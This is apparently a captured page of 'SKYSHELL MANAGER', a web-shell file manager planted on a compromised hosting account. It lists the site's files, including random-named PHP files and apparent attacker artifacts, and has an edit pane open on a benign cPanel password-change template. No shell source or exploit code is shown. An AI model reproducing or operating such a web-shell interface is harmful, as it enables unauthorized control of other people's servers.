📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: main.html.tmpl
<link rel="stylesheet" type="text/css" href="/unprotected/yui/container/assets/container.css" /> <script type="text/javascript" src="/unprotected/yui-gen/utilities_container/utilities_container.js"></script> <script type="text/javascript" src="/cjt/cjt-min.js"></script> <style media="screen" type="text/css"> .label-column { font-weight: bold; text-align: right; } a:link, a:visited, a:active, .action_link { color: #08c; cursor: pointer; } .password_strength { height: 20px; width: 100%; border: 1px solid black; } tr { height: 20px; } #userform input { width: 300px; height: 20px; margin: 5px 0 5px 0; } </style> <form id="userform" method="post" name="userform" onSubmit="return do_validate(this.id);" action="[% cp_security_token %]/?key=[% acct_randkey %]" target="_top"> <!-- prevent password autofill --> <input type="text" style="display:none"> <input type="password" autocomplete='off' style="display:none"> <input type="hidden" name="formaction" value="changepw"> <div class="highlight"> <p>[% locale.maketext('You have not changed your password in [quant,_1,day,days]. The current security policy requires that you change your password every [quant,_2,day,days] to prevent compromised accounts.',days_since_change,maxage) %]</p> </div> <table border="0" cellspacing="2" cellpadding="0"> <tbody> <tr> <td align="right"><label for="oldpass">[% locale.maketext('Old Password:') %]</label></td> <td> <input type="password" autocomplete='off' maxLength="128" name="oldpass" id="oldpassword" size="20" /> </td> <td style="width:280px;"> </td> </tr> <tr> <td class="label-column">[% locale.maketext('New Password:') %]</td> <td> <input type="password" autocomplete='off' name="newpass" id='password' /> </td> <td> <div id="password_error"></div> </td> </tr> <tr> <td align="label-column">[% locale.maketext('Reenter New Password:') %]</td> <td> <input maxLength="128" size="20" name="newpass2" id="pass2" type="password" autocomplete='off' onChange="checksubmit();" /> </td> <td> <div id="pass2_error"></div> </td> </tr> <tr> <td class="label-column">[% locale.maketext('Password Strength:') %] ( <div style="display:inline;" id="why_strong_passwords_link" class="action_link">Why?</div> ):</td> [% INCLUDE 'why_strong_passwords.html.tt' %] <td> <div id="password_strength" class="password_strength"></div> </td> <td style="text-align:left;"> <input type="button" class="btn-secondary" style="width:auto;text-align:left;" id="create_strong_password" value="[% locale.maketext("Password Generator") %]" tabindex="-1" /> </td> </tr> <tr style="height:30px;"> <td></td> <td style="align:center;"><input name="B1" style="height:30px;margin:0px;padding:0px;" type="submit" class="input-button" value="[% locale.maketext('Change Password') %]" /></td> <td></td> </tr> <tr> <td></td> <td style="align:center;"><input type="button" style="height:30px;margin:0px;padding:0px;" value="[% locale.maketext('Log Out') %]" class="input-button" onClick="document.location.replace( '/logout' );"></td> <td></td> </tr> </tbody> </table> <h2>[% locale.maketext('Protect your password:') %]</h2> <p> [% locale.maketext('Do [output,em,not] write down your password. Instead, memorize it.') %] [% locale.maketext('Do not share your password, in particular with anyone who claims to be from computer support or a vendor, unless you are certain that they are who they say they are.') %] [% locale.maketext('Do not allow anyone to watch you enter your password.') %] [% locale.maketext('Do not enter your password on a computer that you do not trust.') %] [% locale.maketext('Change your password often.') %] </p> <h2>[% locale.maketext('Tips for choosing a password:') %]</h2> <p> [% locale.maketext('The system attempts to prevent particularly insecure passwords, but it is not foolproof.') %] [% locale.maketext('Create your password wisely.') %] [% locale.maketext('Do not use words that are in a dictionary, names, or any personal information (for example, your birthday or phone number).') %] [% locale.maketext('Avoid simple patterns. Instead, use UPPER and lower case letters, numbers, and symbols. Make certain that your password is at least eight characters long.') %] [% locale.maketext('When you choose a new password, make certain that it is not related to your previous passwords.') %] </p> </form> <script language="javascript"> window.pwminstrength = parseInt('[% minpwstrength %]') || 0; var passwordValidator = CPANEL.password.setup("password", "pass2", "password_strength", window.pwminstrength, "create_strong_password", "why_strong_passwords_link", "why_strong_passwords_text"); </script>
Save